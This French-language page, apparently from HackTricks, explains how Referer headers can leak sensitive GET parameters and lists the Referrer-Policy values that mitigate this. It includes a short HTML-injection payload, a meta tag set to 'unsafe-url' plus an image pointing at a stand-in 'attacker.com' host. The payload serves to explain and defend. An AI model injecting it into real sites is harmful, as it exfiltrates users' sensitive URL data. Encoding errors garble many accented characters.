tip
Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)
Apprenez et pratiquez le hacking Azure :
HackTricks Training Azure Red Team Expert (AzRTE)
Soutenir HackTricks
- Vérifiez les plans d'abonnement !
- Rejoignez le đŹ groupe Discord ou le groupe telegram ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépÎts github.
En-tĂȘtes de rĂ©fĂ©rent et politique
Le rĂ©fĂ©rent est l'en-tĂȘte utilisĂ© par les navigateurs pour indiquer quelle Ă©tait la page prĂ©cĂ©dente visitĂ©e.
Informations sensibles divulguées
Si Ă un moment donnĂ© Ă l'intĂ©rieur d'une page web, des informations sensibles se trouvent dans les paramĂštres de requĂȘte GET, si la page contient des liens vers des sources externes ou si un attaquant est capable de faire/suggĂ©rer (ingĂ©nierie sociale) Ă l'utilisateur de visiter une URL contrĂŽlĂ©e par l'attaquant. Il pourrait ĂȘtre en mesure d'exfiltrer les informations sensibles Ă l'intĂ©rieur de la derniĂšre requĂȘte GET.
Atténuation
Vous pouvez faire en sorte que le navigateur suive une politique de référent qui pourrait éviter que les informations sensibles soient envoyées à d'autres applications web :
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Contre-mesures
Vous pouvez contourner cette rĂšgle en utilisant une balise meta HTML (l'attaquant doit exploiter une injection HTML) :
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
Défense
Never put any sensitive data inside GET parameters or paths in the URL.
tip
Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)
Apprenez et pratiquez le hacking Azure :
HackTricks Training Azure Red Team Expert (AzRTE)
Soutenir HackTricks
- Vérifiez les plans d'abonnement !
- Rejoignez le đŹ groupe Discord ou le groupe telegram ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépÎts github.